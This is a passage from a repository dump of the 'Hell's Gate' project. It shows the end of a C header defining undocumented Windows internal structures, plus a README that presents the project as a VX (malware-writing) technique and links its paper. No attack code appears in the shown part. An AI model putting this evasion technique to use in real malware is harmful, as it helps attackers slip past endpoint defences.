172 | PVOID glSectionInfo;
173 | PVOID glSection;
174 | PVOID glTable;
175 | PVOID glCurrentRC;
176 | PVOID glContext;
177 | NTSTATUS LastStatusValue;
178 | UNICODE_STRING StaticUnicodeString;
179 | WCHAR StaticUnicodeBuffer[261];
180 | PVOID DeallocationStack;
181 | PVOID TlsSlots[64];
182 | LIST_ENTRY TlsLinks;
183 | PVOID Vdm;
184 | PVOID ReservedForNtRpc;
185 | PVOID DbgSsReserved[2];
186 | #if (NTDDI_VERSION >= NTDDI_WS03)
187 | ULONG HardErrorMode;
188 | #else
189 | ULONG HardErrorsAreDisabled;
190 | #endif
191 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
192 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
193 | GUID ActivityId;
194 | PVOID SubProcessTag;
195 | PVOID EtwLocalData;
196 | PVOID EtwTraceData;
197 | #elif (NTDDI_VERSION >= NTDDI_WS03)
198 | PVOID Instrumentation[14];
199 | PVOID SubProcessTag;
200 | PVOID EtwLocalData;
201 | #else
202 | PVOID Instrumentation[16];
203 | #endif
204 | PVOID WinSockData;
205 | ULONG GdiBatchCount;
206 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
207 | BOOLEAN SpareBool0;
208 | BOOLEAN SpareBool1;
209 | BOOLEAN SpareBool2;
210 | #else
211 | BOOLEAN InDbgPrint;
212 | BOOLEAN FreeStackOnTermination;
213 | BOOLEAN HasFiberData;
214 | #endif
215 | UCHAR IdealProcessor;
216 | #if (NTDDI_VERSION >= NTDDI_WS03)
217 | ULONG GuaranteedStackBytes;
218 | #else
219 | ULONG Spare3;
220 | #endif
221 | PVOID ReservedForPerf;
222 | PVOID ReservedForOle;
223 | ULONG WaitingOnLoaderLock;
224 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
225 | PVOID SavedPriorityState;
226 | ULONG_PTR SoftPatchPtr1;
227 | ULONG_PTR ThreadPoolData;
228 | #elif (NTDDI_VERSION >= NTDDI_WS03)
229 | ULONG_PTR SparePointer1;
230 | ULONG_PTR SoftPatchPtr1;
231 | ULONG_PTR SoftPatchPtr2;
232 | #else
233 | Wx86ThreadState Wx86Thread;
234 | #endif
235 | PVOID* TlsExpansionSlots;
236 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT)
237 | PVOID DeallocationBStore;
238 | PVOID BStoreLimit;
239 | #endif
240 | ULONG ImpersonationLocale;
241 | ULONG IsImpersonating;
242 | PVOID NlsCache;
243 | PVOID pShimData;
244 | ULONG HeapVirtualAffinity;
245 | HANDLE CurrentTransactionHandle;
246 | PTEB_ACTIVE_FRAME ActiveFrame;
247 | #if (NTDDI_VERSION >= NTDDI_WS03)
248 | PVOID FlsData;
249 | #endif
250 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
251 | PVOID PreferredLangauges;
252 | PVOID UserPrefLanguages;
253 | PVOID MergedPrefLanguages;
254 | ULONG MuiImpersonation;
255 | union
256 | {
257 | struct
258 | {
259 | USHORT SpareCrossTebFlags : 16;
260 | };
261 | USHORT CrossTebFlags;
262 | };
263 | union
264 | {
265 | struct
266 | {
267 | USHORT DbgSafeThunkCall : 1;
268 | USHORT DbgInDebugPrint : 1;
269 | USHORT DbgHasFiberData : 1;
270 | USHORT DbgSkipThreadAttach : 1;
271 | USHORT DbgWerInShipAssertCode : 1;
272 | USHORT DbgIssuedInitialBp : 1;
273 | USHORT DbgClonedThread : 1;
274 | USHORT SpareSameTebBits : 9;
275 | };
276 | USHORT SameTebFlags;
277 | };
278 | PVOID TxnScopeEntercallback;
279 | PVOID TxnScopeExitCAllback;
280 | PVOID TxnScopeContext;
281 | ULONG LockCount;
282 | ULONG ProcessRundown;
283 | ULONG64 LastSwitchTime;
284 | ULONG64 TotalSwitchOutTime;
285 | LARGE_INTEGER WaitReasonBitMap;
286 | #else
287 | BOOLEAN SafeThunkCall;
288 | BOOLEAN BooleanSpare[3];
289 | #endif
290 | } TEB, * PTEB;
291 |
292 | typedef struct _LDR_DATA_TABLE_ENTRY {
293 | LIST_ENTRY InLoadOrderLinks;
294 | LIST_ENTRY InMemoryOrderLinks;
295 | LIST_ENTRY InInitializationOrderLinks;
296 | PVOID DllBase;
297 | PVOID EntryPoint;
298 | ULONG SizeOfImage;
299 | UNICODE_STRING FullDllName;
300 | UNICODE_STRING BaseDllName;
301 | ULONG Flags;
302 | WORD LoadCount;
303 | WORD TlsIndex;
304 | union {
305 | LIST_ENTRY HashLinks;
306 | struct {
307 | PVOID SectionPointer;
308 | ULONG CheckSum;
309 | };
310 | };
311 | union {
312 | ULONG TimeDateStamp;
313 | PVOID LoadedImports;
314 | };
315 | PACTIVATION_CONTEXT EntryPointActivationContext;
316 | PVOID PatchInformation;
317 | LIST_ENTRY ForwarderLinks;
318 | LIST_ENTRY ServiceTagLinks;
319 | LIST_ENTRY StaticLinks;
320 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
321 |
322 | typedef struct _OBJECT_ATTRIBUTES {
323 | ULONG Length;
324 | PVOID RootDirectory;
325 | PUNICODE_STRING ObjectName;
326 | ULONG Attributes;
327 | PVOID SecurityDescriptor;
328 | PVOID SecurityQualityOfService;
329 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
330 |
331 | typedef struct _INITIAL_TEB {
332 | PVOID StackBase;
333 | PVOID StackLimit;
334 | PVOID StackCommit;
335 | PVOID StackCommitMax;
336 | PVOID StackReserved;
337 | } INITIAL_TEB, * PINITIAL_TEB;
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Hell's Gate ##
2 |
3 | Original C Implementation of the Hell's Gate VX Technique
4 |
5 |
6 | Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
7 |
PDF also included in this repository.
8 |
9 |
10 | Authors:
11 | * Paul Laîné (@am0nsec)
12 | * smelly__vx (@RtlMateusz)
13 |
14 |
15 | ### Update ###
16 | Please note:
17 | * We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
18 | * We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
19 | * Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
20 | * Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
21 |
22 |
--------------------------------------------------------------------------------
/hells-gate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/am0nsec/HellsGate/1d860c0734c0e35a2f026d9a04856ded19dfdf31/hells-gate.pdf
--------------------------------------------------------------------------------